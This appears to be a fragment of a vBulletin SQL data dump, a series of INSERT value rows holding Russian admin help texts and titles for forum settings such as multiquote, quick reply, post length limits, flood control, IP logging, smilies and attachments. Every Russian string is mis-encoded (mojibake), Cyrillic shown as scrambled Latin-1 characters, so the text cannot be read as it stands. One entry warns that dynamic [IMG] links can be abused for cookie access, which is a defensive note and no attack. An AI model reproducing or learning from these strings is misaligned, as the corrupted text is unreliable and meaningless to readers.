(23308, -1, 'options_options_mqlimit_text', 'cphelptext', 'Ãðåäåë äëÿ ìóëüòèöèòèðîâà Ãèÿ èñïîëüçóåòñÿ äëÿ îãðà Ãè÷åÃèÿ ìà êñèìà ëüÃîãî êîëè÷åñòâà öèòà ò, êîòîðûå ìîãóò áûòü äîáà âëåÃû ïîëüçîâà òåëåì ÷åðåç êÃîïêó ìóëüòèöèòèðîâà Ãèÿ. Ãòî ñäåëà Ãî, ÷òîáû ïðåäîòâðà òèòü ïîòåÃöèà ëüÃûé îòêà ç ðà áîòû ñèñòåìû. \r\nÃîìÃèòå, ÷òî äà ÃÃà ÿ îïöèÿ ÃÃ¥ îãðà Ãè÷èò îáùåå ÷èñëî öèòà ò â ñîîáùåÃèè ïîëüçîâà òåëåé, òà ê êà ê êà æäûé ìîæåò ñà ìîñòîÿòåëüÃî äîáà âèòü BB êîä [QUOTE].', 'vbulletin', 'zCarot', 1205942207, '3.7.0 Release Candidate 1'),
(23309, -1, 'options_options_mqlimit_title', 'cphelptext', 'Ãðåäåë äëÿ ìóëüòèöèòèðîâà Ãèÿ', 'vbulletin', 'zCarot', 1150976775, '3.6.0 Beta 4'),
(23310, -1, 'options_options_multiquote_text', 'cphelptext', 'Ìóëüòèöèòèðîâà Ãèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëþ âûáðà òü Ãåñêîëüêî ñîîáùåÃèé, Ãà æèìà ÿ îïðåäåë¸ÃÃóþ êÃîïêó ó êà æäîãî èç Ãèõ. Ãðè Ãà æà òèè ïîëüçîâà òåëåì êÃîïêè äëÿ îòâåòà , òåêñò êà æäîãî âûáðà ÃÃîãî ñîîáùåÃèÿ áóäåò ïðîöèòèðîâà à â ïîëå äëÿ îòâåòà . \r\n \r\nÓ÷òèòå, ÷òî ýòà ôóÃêöèÿ äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëþ îòâå÷à òü Ãà Ãåñêîëüêî ñîîáùåÃèé îäÃîâðåìåÃÃî, ïîýòîìó ñîîáùåÃèÿ, ñäåëà ÃÃûå ñ ïîìîùüþ ýòîé ôóÃêöèè, ÃÃ¥ áóäóò ïðà âèëüÃî ïîñòà âëåÃû â äðåâîâèäÃîì ðåæèìå!', 'vbulletin', 'zCarot', 1150976414, '3.6.0 Beta 4'),
(23311, -1, 'options_options_multiquote_title', 'cphelptext', 'Âêëþ÷èòü ìóëüòèöèòèðîâà Ãèå', 'vbulletin', 'zCarot', 1148819740, '3.6.0 Beta 1'),
(23312, -1, 'options_options_quickreply_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî âÃèçó ñòðà Ãèöû ïîÿâèòñÿ îêÃî äëÿ áûñòðîãî îòâåòà â òåêóùóþ òåìó áåç çà ãðóçêè ïîëÃîé ñòðà Ãèöû äëÿ îòâåòîâ. Âû ìîæåòå âûáðà òü ñîîòâåòñòâóþùóþ îïöèþ, ÷òîáû áûñòðûé îòâåò áûë äîñòóïåà ïîñëå Ãà æà òèÿ Ãà ñîîòâåòñòâóþùóþ èêîÃêó â ñîîáùåÃèè. Äà æå åñëè áûñòðûé îòâåò âêëþ÷åÃ, ïîëüçîâà òåëè âñ¸ ðà âÃî ñìîãóò èñïîëüçîâà òü ïîëÃóþ ñòðà Ãèöó äëÿ îòâåòîâ.\r\n\r\nÅñëè âû èñïîëüçóåòå îïöèþ \"Òðåáóåòñÿ Ãà æà òèå\", òî ïîëüçîâà òåëÿì ñÃà ÷à ëà ÃóæÃî áóäåò Ãà æà òü Ãà èêîÃêó áûñòðîãî îòâåòà , ÷òîáû èñïîëüçîâà òü åãî.  ïðîòèâÃîì ñëó÷à å ýòîãî ÃÃ¥ ïîòðåáóåòñÿ, Ãî òîãäà èñïîëüçîâà Ãèå äðåâîâèäÃîãî/êîìáèÃèðîâà ÃÃîãî ðåæèìîâ ñòà Ãîâèòñÿ ïðà êòè÷åñêè áåñïîëåçÃûì, òà ê êà ê ñèñòåìà ÃÃ¥ áóäåò çÃà òü, Ãà êà êîå ñîîáùåÃèå îòâå÷à þò, ïîýòîìó ïðîñòî äîáà âèò åãî â êîÃåö.', 'vbulletin', '', 0, ''),
(23313, -1, 'options_options_quickreply_title', 'cphelptext', 'Âêëþ÷èòü ôîðìó áûñòðîãî îòâåòà ', 'vbulletin', '', 0, ''),
(23314, -1, 'options_options_postminchars_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò ìèÃèìà ëüÃîå êîëè÷åñòâî ñèìâîëîâ, êîòîðûå äîëæåà ââåñòè ïîëüçîâà òåëü äëÿ îòïðà âêè ñîîáùåÃèÿ. Óêà æèòå 0 äëÿ âûêëþ÷åÃèÿ.', 'vbulletin', '', 0, ''),
(23315, -1, 'options_options_postminchars_title', 'cphelptext', 'ÌèÃèìà ëüÃà ÿ äëèÃà ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(23316, -1, 'options_options_ignorequotechars_text', 'cphelptext', 'Åñëè âêëþ÷èòü ýòó îïöèþ, âåñü ïðîöèòèðîâà ÃÃûé â ñîîáùåÃèè òåêñò áóäåò èãÃîðèðîâà òüñÿ ïðè ïîäñ÷¸òå êîëè÷åñòâà ñèìâîëîâ â øì. Ãåêîòîðûå ïîëüçîâà òåëè ëþáÿò öèòèðîâà òü áîëüøèå ñîîáùåÃèÿ è âñòà âëÿòü â êà ÷åñòâå îòâåòà ñìà éëû èëè êîðîòêèå ôðà çû. Ãòà îïöèÿ ïðåäîòâðà ùà åò ïîäîáÃîå.', 'vbulletin', '', 0, ''),
(23317, -1, 'options_options_ignorequotechars_title', 'cphelptext', 'ÈãÃîðèðîâà òü òåêñò â BB êîäå [QUOTE] ïðè ïðîâåðêå ìèÃèìà ëüÃîãî êîëè÷åñòâà ñèìâîëîâ â ñîîáùåÃèè', 'vbulletin', '', 0, ''),
(23318, -1, 'options_options_titlemaxchars_text', 'cphelptext', 'Ãà çâà Ãèÿ òåì è çà ãîëîâêè ñîîáùåÃèé áóäóò îãðà Ãè÷åÃû â ðà çìåðå äà ÃÃûì êîëè÷åñòâîì ñèìâîëîâ. Ãîæà ëóéñòà , óêà æèòå çäåñü ÷èñëî áîëüøå 1 è ìåÃüøå 251.', 'vbulletin', 'zCarot', 1195733051, '3.7.0 Beta 1'),
(23319, -1, 'options_options_titlemaxchars_title', 'cphelptext', 'Ìà êñèìóì ñèìâîëîâ â Ãà çâà Ãèè òåì/çà ãîëîâêå ñîîáùåÃèé', 'vbulletin', 'zCarot', 1195733051, '3.7.0 Beta 1'),
(23320, -1, 'options_options_quotetitle_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî â ïîëå çà ãîëîâêà Ãîâîãî ñîîáùåÃèÿ áóäåò âñòà âëåÃî \"Îòâåò: \" è çà ãîëîâîê ñîîáùåÃèÿ, Ãà êîòîðîå áóäóò îòâå÷à òü, èëè Ãà çâà Ãèå òåìû. Ãîëüçîâà òåëü âñå åù¸ ñìîæåò îòðåäà êòèðîâà òü åãî ïî æåëà Ãèþ. Åñëè âû âûêëþ÷èòå ýòó îïöèþ, òî ïîëå äëÿ çà ãîëîâêà áóäåò ïóñòûì ïî óìîë÷à Ãèþ.', 'vbulletin', '', 0, ''),
(23321, -1, 'options_options_quotetitle_title', 'cphelptext', 'Àâòîìà òè÷åñêè öèòèðîâà òü çà ãîëîâîê ñîîáùåÃèÿ èëè Ãà çâà Ãèå òåìû', 'vbulletin', '', 0, ''),
(23322, -1, 'options_options_postmaxchars_text', 'cphelptext', 'Óñòà Ãîâèòå çäåñü ìà êñèìà ëüÃîå êîëè÷åñòâî ñèìâîëîâ, êîòîðûå âû æåëà åòå ðà çðåøèòü â îäÃîì ñîîáùåÃèè. Åñëè âû óêà æåòå çäåñü 0, òî ïðîâåðêà Ãà êîëè÷åñòâî ñèìâîëîâ áóäåò îòêëþ÷åÃà .', 'vbulletin', '', 0, ''),
(23323, -1, 'options_options_postmaxchars_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ äëèÃà ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(23324, -1, 'options_options_maximages_text', 'cphelptext', 'Óñòà Ãîâêà ìà êñèìà ëüÃîãî êîëè÷åñòâà èçîáðà æåÃèé, äîïóñòèìûõ â îäÃîì ñîîáùåÃèè (âìåñòå ñ ïîäïèñüþ). Äëÿ ïðîñòîòû ñîîáùåÃèå è ïîäïèñü ó÷à ñòÃèêà ñ÷èòà þòñÿ, êà ê îäÃî öåëîå. ×òîáû îòêëþ÷èòü ïîäñ÷¸ò èçîáðà æåÃèé, óñòà Ãîâèòå çÃà ÷åÃèå 0.', 'vbulletin', '', 0, ''),
(23325, -1, 'options_options_maximages_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî èçîáðà æåÃèé â ñîîáùåÃèè/ïîäïèñè', 'vbulletin', '', 0, ''),
(23326, -1, 'options_options_stopshouting_text', 'cphelptext', 'Ñëîâà ïîëüçîâà òåëåé, êîòîðûå ïèøóò ñ âêëþ÷åÃÃûì CAPS`îì, ìîãóò áûòü êîÃâåðòèðîâà Ãû â ÃèæÃèé ðåãèñòð, â çà âèñèìîñòè îò ðà çìåðà êà æäîãî ñëîâà . \r\nÅñëè âû ïîñòà âèòå ðà çìåð ñëîâà 0, òî ôóÃêöèÿ áóäåò âûêëþ÷åÃà . \r\nÄëÿ ôîðóìîâ ñ ÃÃ¥ à Ããëèéñêèì ñîäåðæèìûì ýòà îïöèÿ ìîæåò âûçûâà òü ïðîáëåìû, ïîýòîìó, âîçìîæÃî, ïîòðåáóåòñÿ å¸ îòêëþ÷èòü.', 'vbulletin', '', 0, ''),
(23327, -1, 'options_options_stopshouting_title', 'cphelptext', 'Ãðåäîòâðà ùåÃèå \"ÊÃÈÊÀ\"', 'vbulletin', '', 0, ''),
(23328, -1, 'options_options_allowdynimg_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè ïîëüçîâà òåëè ñìîãóò èñïîëüçîâà òü äèÃà ìè÷åñêèå ññûëêè (ñîäåðæà ùèå ? è & â êîÃöå è ïðî÷èå ñïåöñèìâîëû) â BB êîäå [IMG]. ÑîîáùåÃèå ñ òà êèì èçîáðà æåÃèåì ìîæåò èñïîëüçîâà òüñÿ â ñîáñòâåÃÃûõ öåëÿõ, ÷òî ìîæåò Ãà âðåäèòü êîìó-ëèáî. Ãòî ìîæåò áûòü èñïîëüçîâà Ãî äëÿ ÷òåÃèÿ èëè çà ïèñè cookies èëè ÷åãî-ëèáî åù¸. Ãî ñîîáðà æåÃèÿì áåçîïà ñÃîñòè ýòà îïöèÿ äîëæÃà áûòü ÎÒÊËÞ×ÅÃÀ.', 'vbulletin', 'zCarot', 1161596872, '3.6.3'),
(23329, -1, 'options_options_allowdynimg_title', 'cphelptext', 'Ãà çðåøèòü äèÃà ìè÷åñêèå ññûëêè äëÿ BB êîäà [IMG]', 'vbulletin', '', 0, ''),
(23330, -1, 'options_options_floodchecktime_text', 'cphelptext', 'Åñëè âû ââåäåòå ÷èñëî, îòëè÷Ãîå îò Ãóëÿ (÷òî îòêëþ÷èò ýòó ôóÃêöèþ), ïîëüçîâà òåëü ñìîæåò îòïðà âèòü Ãîâîå ñîîáùåÃèå òîëüêî ïî ïðîøåñòâèè óêà çà ÃÃîãî êîëè÷åñòâà ñåêóÃä, ïîñëå ðà çìåùåÃèÿ ïðåäûäóùåãî. Ãòî ìîæåò ïðåäîòâðà òèòü Ãà âà øåì ôîðóìå ôëóä Ãîâûìè ñîîáùåÃèÿìè, ñ èñïîëüçîâà Ãèåì êà ê ðó÷Ãîãî, òà ê è à âòîìà òè÷åñêîãî ñîçäà Ãèÿ ñîîáùåÃèé. ÀäìèÃèñòðà òîðà ì è ìîäåðà òîðà ì áóäåò ïðîùå óäà ëÿòü òà êèå ñîîáùåÃèÿ.', 'vbulletin', '', 0, ''),
(23331, -1, 'options_options_floodchecktime_title', 'cphelptext', 'ÌèÃèìà ëüÃîå âðåìÿ ìåæäó ñîîáùåÃèÿìè', 'vbulletin', '', 0, ''),
(23332, -1, 'options_options_editthreadtitlelimit_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò êîëè÷åñòâî ìèÃóò, â òå÷åÃèè êîòîðûõ ïîëüçîâà òåëü ñìîæåò îòðåäà êòèðîâà òü Ãà çâà Ãèå òåìû, êîòîðóþ îà ñîçäà ë. Ãîñëå ýòîãî ïåðèîäà èçìåÃÃ¥Ãèå òåìû áóäåò êà ñà òüñÿ òîëüêî èçìåÃÃ¥Ãèÿ çà ãîëîâêà ïåðâîãî ñîîáùåÃèÿ â òåìå (à äìèÃèñòðà òîðû è ìîäåðà òîðû ìîãóò âñåãäà ðåäà êòèðîâà òü Ãà çâà Ãèå òåìû).', 'vbulletin', '', 0, ''),
(23333, -1, 'options_options_editthreadtitlelimit_title', 'cphelptext', 'Ñðîê Ãà ðåäà êòèðîâà Ãèå çà ãîëîâêà òåìû', 'vbulletin', '', 0, ''),
(23334, -1, 'options_options_addpolltimeout_text', 'cphelptext', 'Îïöèÿ îïðåäåëÿåò êîëè÷åñòâî ìèÃóò ïîñëå ñîçäà Ãèÿ òåìû, â òå÷åÃèè êîòîðûõ ïîëüçîâà òåëü åùå ìîæåò äîáà âèòü ê Ãåé îïðîñ. ÀäìèÃèñòðà òîðû è ìîäåðà òîðû ñ ïðà âà ìè ðåäà êòèðîâà Ãèÿ îïðîñîâ âñåãäà ñìîãóò äîáà âèòü îïðîñ ê òåìå áåç îãðà Ãè÷åÃèÿ äà âÃîñòè å¸ ñîçäà Ãèÿ.', 'vbulletin', '', 0, ''),
(23335, -1, 'options_options_addpolltimeout_title', 'cphelptext', 'Ñðîê äîáà âëåÃèÿ îïðîñà ê òåìå', 'vbulletin', '', 0, ''),
(23336, -1, 'options_options_edittimelimit_text', 'cphelptext', 'Ãòî âðåìÿ â ìèÃóòà õ, Ãà ÷èÃà ÿ îò îòïðà âêè ñîîáùåÃèÿ. Åñëè ïîëüçîâà òåëü ðà çìåñòèë ñîîáùåÃèå â 1:00 è çäåñü óñòà ÃîâëåÃî 5, òî ïîëüçîâà òåëü ÃÃ¥ ñìîæåò ðåäà êòèðîâà òü ñîîáùåÃèå ïîñëå 1:05.', 'vbulletin', '', 0, ''),
(23337, -1, 'options_options_edittimelimit_title', 'cphelptext', 'Ñðîê ðåäà êòèðîâà Ãèÿ ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(23338, -1, 'options_options_noeditedbytime_text', 'cphelptext', 'Ãòî êîëè÷åñòâî ìèÃóò, â òå÷åÃèè êîòîðûõ ïîëüçîâà òåëü ìîæåò îòðåäà êòèðîâà òü ñâîå ñîîáùåÃèå áåç äà ëüÃåéøåãî îòîáðà æåÃèÿ Ãà äïèñè Îòðåäà êòèðîâà Ãî xxx (õõõ - èìÿ ïîëüçîâà òåëÿ) ïîä ñîîáùåÃèåì.', 'vbulletin', '', 0, ''),
(23339, -1, 'options_options_noeditedbytime_title', 'cphelptext', 'Âðåìÿ äî ïîÿâëåÃèÿ Ãà äïèñè \"Ãåäà êòèðîâà ëîñü...\"', 'vbulletin', '', 0, ''),
(23340, -1, 'options_options_logip_text', 'cphelptext', 'Åñëè âûáðà òü \"ÃÃ¥ çà ïèñûâà òü IP\", òî IP ÃÃ¥ áóäóò çà ïèñûâà òüñÿ âî âðåìÿ îòïðà âêè ñîîáùåÃèé. Åñëè âûáðà òü \"Îòîáðà æà òü òîëüêî ìîäåðà òîðà ì è à äìèÃà ì\", IP áóäóò çà ïèñûâà òüñÿ è îòîáðà æà òüñÿ òîëüêî à äìèÃèñòðà òîðà ì è ìîäåðà òîðà ì. Âûáîð âà ðèà Ãòà \"Îòîáðà æà òü âñåì\" äà ñò êà æäîìó âîçìîæÃîñòü âèäåòü IP îòïðà âèòåëÿ ñîîáùåÃèÿ.', 'vbulletin', '', 0, ''),
(23341, -1, 'options_options_logip_title', 'cphelptext', 'Çà ïèñûâà òü IP à äðåñ', 'vbulletin', '', 0, ''),
(23342, -1, 'options_options_allowvbcodebuttons_text', 'cphelptext', 'Åñëè âû óñòà Ãîâèòå ýòó îïöèþ â \"Îòêëþ÷èòü ïà Ãåëü ôîðìà òèðîâà Ãèÿ\", ïà Ãåëü ôîðìà òèðîâà Ãèÿ, îáëåã÷à þùà ÿ èñïîëüçîâà Ãèå BB êîäîâ è âèçóà ëüÃûé ðåäà êòîð , êîòîðûé ïîçâîëÿåò ó÷à ñòÃèêà ì ðåäà êòèðîâà òü ñîîáùåÃèÿ â ñòèëå Microsoft Word, áóäóò ÃåäîñòóïÃû. Âûáîð ýòîé îïöèè òà êæå îòêëþ÷èò ïà Ãåëü ñìà éëîâ. \r\nÓñòà Ãîâêà îïöèè â \"Âêëþ÷èòü òîëüêî ñòà Ãäà ðòÃóþ ïà Ãåëü\" ïîçâîëèò ïîëüçîâà òåëÿì èñïîëüçîâà òü ïà Ãåëü ôîðìà òèðîâà Ãèÿ, ïîõîæóþ Ãà òó, ÷òî áûëà âî 2-é âåðñèè ýòîãî ôîðóìà . ÃŽÃà îáëåã÷à åò èñïîëüçîâà Ãèå BB êîäîâ. \r\nÓñòà Ãîâêà îïöèè â \"Âêëþ÷èòü ïà Ãåëè îáû÷Ãîãî è âèçóà ëüÃîãî ðåäà êòîðà \" ïîçâîëèò ïîëüçîâà òåëÿì âûáèðà òü ñà ìîñòîÿòåëüÃî ìåæäó ïà Ãåëÿìè ñòà Ãäà ðòÃîãî è âèçóà ëüÃîãî ðåäà êòîðà .', 'vbulletin', 'zCarot', 1206966247, '3.7.0 Release Candidate 2'),
(23343, -1, 'options_options_allowvbcodebuttons_title', 'cphelptext', 'Âêëþ÷èòü óïðà âëåÃèå ôîðìà òèðîâà Ãèåì ñîîáùåÃèÿìè', 'vbulletin', '', 0, ''),
(23344, -1, 'options_options_editormodes_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, êà êîé ìà êñèìà ëüÃûé óðîâåÃü óïðà âëåÃèÿ ôîðìà òèðîâà Ãèåì òåêñòà áóäåò äîñòóïåà â ðà çëè÷Ãûõ ÷à ñòÿõ ôîðóìà . \r\n \r\nÃîëÃûé ðåäà êòîð èñïîëüçóåòñÿ âî âñåõ ìåñòà õ, ãäå ÃÃ¥ èñïîëüçóåòñÿ áûñòðûé îòâåò èëè áûñòðîå ðåäà êòèðîâà Ãèå.', 'vbulletin', 'zCarot', 1155819213, '3.6.1'),
(23345, -1, 'options_options_editormodes_title', 'cphelptext', 'Âêëþ÷èòü óïðà âëåÃèå ôîðìà òèðîâà Ãèåì ñîîáùåÃèÿìè', 'vbulletin', 'zCarot', 1155819213, '3.6.1'),
(23346, -1, 'options_options_smtotal_text', 'cphelptext', 'Ââåäèòå îáùåå êîëè÷åñòâî ñìà éëîâ, êîòîðûå ñëåäóåò îòîáðà æà òüñÿ â ïà Ãåëè ñìà éëîâ äî òîãî, êà ê ïîëüçîâà òåëþ ïðèäåòñÿ Ãà æà òü Ãà ññûëêó äëÿ ïðîäîëæåÃèÿ. Åñëè âû æåëà åòå ñêðûòü ïà Ãåëü ñìà éëîâ, òî óêà æèòå çäåñü 0.', 'vbulletin', '', 0, ''),
(23347, -1, 'options_options_smtotal_title', 'cphelptext', 'Êîëè÷åñòâî ñìà éëîâ â ïà Ãåëè', 'vbulletin', '', 0, ''),
(23348, -1, 'options_options_smcolumns_text', 'cphelptext', 'Åñëè ïà Ãåëü ñìà éëîâ âêëþ÷åÃà , òî âû ìîæåòå óêà çà òü çäåñü êîëè÷åñòâî êîëîÃîê, â êîòîðûõ îÃè áóäóò îòîáðà æà òüñÿ.', 'vbulletin', '', 0, ''),
(23349, -1, 'options_options_smcolumns_title', 'cphelptext', 'ÊîëîÃîê ñìà éëîâ â ïà Ãåëè ñìà éëîâ', 'vbulletin', '', 0, ''),
(23350, -1, 'options_options_wysiwyg_smtotal_text', 'cphelptext', 'Èñïîëüçóéòå ýòó îïöèþ, ÷òîáû óñòà Ãîâèòü êîëè÷åñòâî ñìà éëîâ, îòîáðà æà åìûõ â ìåÃþ ñìà éëîâ âèçóà ëüÃîãî ðåäà êòîðà , äî òîãî êà ê ïîÿâèòñÿ ññûëêà \"Ãîêà çà òü âñå ñìà éëû\". \r\n\r\nÓêà æèòå çäåñü 0, ÷òîáû ïîëÃîñòüþ ñêðûòü ìåÃþ ñìà éëîâ.', 'vbulletin', '', 0, ''),
(23351, -1, 'options_options_wysiwyg_smtotal_title', 'cphelptext', 'Êîëè÷åñòâî ñìà éëîâ â ìåÃþ âèçóà ëüÃîãî ðåäà êòîðà ', 'vbulletin', '', 0, ''),
(23352, -1, 'options_options_attachtotalspace_text', 'cphelptext', 'Ââåäèòå çÃà ÷åÃèå â áà éòà õ. \r\n1024 áà éòà = 1 êèëîáà éò \r\n1048576 áà éò = 1 ìåãà áà éò \r\nÎáùèé ðà çìåð âëîæåÃèé ÃÃ¥ äîëæåà ïðåâûøà òü ýòî ÷èñëî.', 'vbulletin', 'zCarot', 1172228521, '3.6.5'),
(23353, -1, 'options_options_attachtotalspace_title', 'cphelptext', 'Ãðåäåë äèñêîâîãî ïðîñòðà Ãñòâà ïîä âëîæåÃèÿ (ÂÑÅ)', 'vbulletin', '', 0, ''),
(23354, -1, 'options_options_attachlimit_text', 'cphelptext', 'Ââåäèòå öåëîå ïîëîæèòåëüÃîå ÷èñëî èëè 0. \r\nÔîðóì ïîçâîëÿåò ïîëüçîâà òåëÿì ïðèêðåïëÿòü Ãåñêîëüêî ôà éëîâ ê îäÃîìó ñîîáùåÃèþ. Ãòà îïöèÿ îïðåäåëÿåò ìà êñèìà ëüÃîå êîëè÷åñòâî ôà éëîâ, êîòîðîå ìîæÃî ïðèêðåïèòü ê îäÃîìó ñîîáùåÃèþ.', 'vbulletin', '', 0, ''),
(23355, -1, 'options_options_attachlimit_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî âëîæåÃèé â ñîîáùåÃèè', 'vbulletin', '', 0, ''),
(23356, -1, 'options_options_attachboxcount_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò ìà êñèìà ëüÃîå êîëè÷åñòâî âëîæåÃèé, êîòîðîå ìîæÃî ïðèêðåïèòü çà îäÃó çà ãðóçêó, õîòÿ ýòî è ÃÃ¥ îãðà Ãè÷èâà åò ìà êñèìà ëüÃîå êîëè÷åñòâî âëîæåÃèé, êîòîðûå ìîæÃî ïðèêðåïèòü ê îäÃîìó ñîîáùåÃèþ. \r\nÃà ïðèìåð, åñëè ïîëüçîâà òåëü æåëà åò ïðèêðåïèòü 5 ôà éëîâ ê ñâîåìó ñîîáùåÃèþ (ïðåäïîëîæèì, ÷òî âû ðà çðåøèëè ïðèêðåïëÿòü êà ê ìèÃèìóì 5 âëîæåÃèé), è âû óñòà Ãîâèëè çà ãðóçêó òîëüêî 3 ôà éëîâ çà ðà ç (ýòà óñòà Ãîâêà ), òî ïîëüçîâà òåëþ áóäåò Ãåîáõîäèìî âûáðà òü è çà ãðóçèòü ñÃà ÷à ëà 3 ôà éëà èç 5, à çà òåì âûáðà òü è çà ãðóçèòü åùå 2 ôà éëà .', 'vbulletin', '', 0, ''),
(23357, -1, 'options_options_attachboxcount_title', 'cphelptext', 'Çà ãðóæà òü âëîæåÃèé', 'vbulletin', '', 0, ''),
(23358, -1, 'options_options_attachurlcount_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîäîáåà ïà ðà ìåòðó \"Çà ãðóæà òü âëîæåÃèé\", òîëüêî âìåñòî ïîëåé äëÿ çà ãðóçêè ôà éëîâ - ññûëêè äëÿ çà ãðóçêè. \r\n\r\nÂëîæåÃèÿ, óêà çà ÃÃûå ññûëêà ìè, áóäóò ñêîïèðîâà Ãû ê âà ì Ãà ñåðâåð Ãà ïðÿìóþ (êà ê à âà òà ðû).', 'vbulletin', '', 0, ''),
(23359, -1, 'options_options_attachurlcount_title', 'cphelptext', 'Ññûëîê äëÿ çà ãðóçêè âëîæåÃèé', 'vbulletin', '', 0, ''),
(23360, -1, 'options_options_allowattachdel_text', 'cphelptext', 'Îãðà Ãè÷åÃèå ïî âðåìåÃè, ê êîòîðîìó îòÃîñèòñÿ ýòà óñòà Ãîâêà , îïðåäåëÿåòñÿ çäåñü . (Ñðîê ðåäà êòèðîâà Ãèÿ ñîîáùåÃèé).', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(23361, -1, 'options_options_allowattachdel_title', 'cphelptext', 'Ãà çðåøèòü óäà ëÿòü âëîæåÃèÿ, ïî èñòå÷åÃèè ñðîêà ðåäà êòèðîâà Ãèÿ', 'vbulletin', '', 0, ''),
(23362, -1, 'options_options_allowclosedattachdel_text', 'cphelptext', 'Îãðà Ãè÷åÃèå ïî âðåìåÃè, ê êîòîðîìó îòÃîñèòñÿ ýòà óñòà Ãîâêà , îïðåäåëÿåòñÿ çäåñü . (Ñðîê ðåäà êòèðîâà Ãèÿ ñîîáùåÃèé).', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(23363, -1, 'options_options_allowclosedattachdel_title', 'cphelptext', 'Ãà çðåøèòü óäà ëÿòü âëîæåÃèÿ, äà æå åñëè òåìà çà êðûòà ', 'vbulletin', '', 0, ''),
(23364, -1, 'options_options_allowduplicates_text', 'cphelptext', 'Åñëè óñòà ÃîâëåÃî \"Ãåò\", ôîðóì ÃÃ¥ ïîçâîëèò îäÃîìó è òîìó æå ïîëüçîâà òåëþ çà ãðóæà òü îäèÃà êîâûå âëîæåÃèÿ äâà æäû. Ãòî ìîæåò áûòü èñïîëüçîâà Ãî äëÿ ïðåäîòâðà ùåÃèÿ çà áèâà Ãèÿ áà çû äà ÃÃûõ îäèÃà êîâûìè âëîæåÃèÿìè.', 'vbulletin', '', 0, ''),
(23365, -1, 'options_options_allowduplicates_title', 'cphelptext', 'Ãà çðåøèòü äóáëèðîâà òü âëîæåÃÃûå èçîáðà æåÃèÿ', 'vbulletin', '', 0, ''),
(23366, -1, 'options_options_viewattachedimages_text', 'cphelptext', 'Âêëþ÷èâ ýòó îïöèþ, âû ðà çðåøèòå îòîáðà æåÃèå èçîáðà æåÃèé âÃóòðè ñîîáùåÃèÿ, ò.Ã¥. ÃÃ¥ ÃóæÃî áóäåò Ãà æèìà òü Ãà ññûëêó, ÷òîáû óâèäåòü èõ. \r\n\r\nÂêëþ÷èâ ýòî îïöèþ, âû ñäåëà åòå ïðîñìîòð âëîæåÃÃûõ èçîáðà æåÃèé áîëåå óäîáÃûì, Ãî ïðè ýòîì âîçðà ñò¸ò âðåìÿ çà ãðóçêè òåì ñî ìÃîæåñòâîì âëîæåÃÃûõ èçîáðà æåÃèé, óâåëè÷èòñÿ òðà ôèê è âîçðà ñò¸ò èñïîëüçîâà Ãèå ðåñóðñîâ ñåðâåðà ïðè çà ãðóçêè ïîëüçîâà òåëåì òåìû ñî ìÃîæåñòâîì âëîæåÃÃûõ èçîáðà æåÃèé.', 'vbulletin', '', 0, ''),
(23367, -1, 'options_options_viewattachedimages_title', 'cphelptext', 'Ãîêà çûâà òü èçîáðà æåÃèÿ âÃóòðè ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(23368, -1, 'options_options_attachthumbs_text', 'cphelptext', 'ÌèÃèà òþðà - óìåÃüøåÃÃà ÿ êîïèÿ èçîáðà æåÃèÿ. Êîãäà ìèÃèà òþðû âêëþ÷åÃû, âëîæåÃÃûå èçîáðà æåÃèÿ áóäóò âûãëÿäåòü êà ê èõ óìåÃüøåÃÃûå êîïèè. Ãîëüçîâà òåëü ñìîæåò Ãà æà òü Ãà ìèÃèà òþðó è óâèäåòü ïîëÃóþ âåðñèþ èçîáðà æåÃèÿ. \r\n\r\nÂêëþ÷åÃèå ìèÃèà òþð ïîëåçÃî äëÿ óìåÃüøåÃèÿ òðà ôèêà è â ñëó÷à ÿõ, êîãäà ðåà ëüÃûå ðà çìåðû èçîáðà æåÃèé Ãà ìÃîãî ïðåâîñõîäÿò ðà çìåðû ñòðà Ãèöû ôîðóìà , ÷òî ïðèâåäåò ê èñêà æåÃèþ ñòðóêòóðû. Äëÿ îòîáðà æåÃèÿ ãðà Ãèö ìèÃèà òþðû è ðà çìåðîâ ðåà ëüÃîãî èçîáðà æåÃèÿ Ãà Ãåé âà ì ñëåäóåò èñïîëüçîâà òü áèáëèîòåêè îáðà áîòêè èçîáðà æåÃèé (GD2 èëè Imagemagick). Äà æå åñëè ó âà ñ èñïîëüçóåòñÿ GD1, òî âû âñ¸ ðà âÃî ÃÃ¥ óâèäèòå ãðà Ãèö è ðà çìåðîâ. \r\n\r\nÅñëè âû âêëþ÷à åòå ýòó îïöèþ è ó âà ñ åñòü óæå âëîæåÃèÿ èçîáðà æåÃèé Ãà ôîðóìå, òî âà ì áóäåò Ãåîáõîäèìî ïåðåñòðîèòü âà øè ìèÃèà òþðû , ÷òîáû ñîçäà òü èõ äëÿ ñóùåñòâóþùèõ âëîæåÃèé.', 'vbulletin', 'zCarot', 1205942249, '3.7.0 Release Candidate 1'),
(23369, -1, 'options_options_attachthumbs_title', 'cphelptext', 'Ñîçäà Ãèå ìèÃèà òþð èçîáðà æåÃèé', 'vbulletin', '', 0, ''),
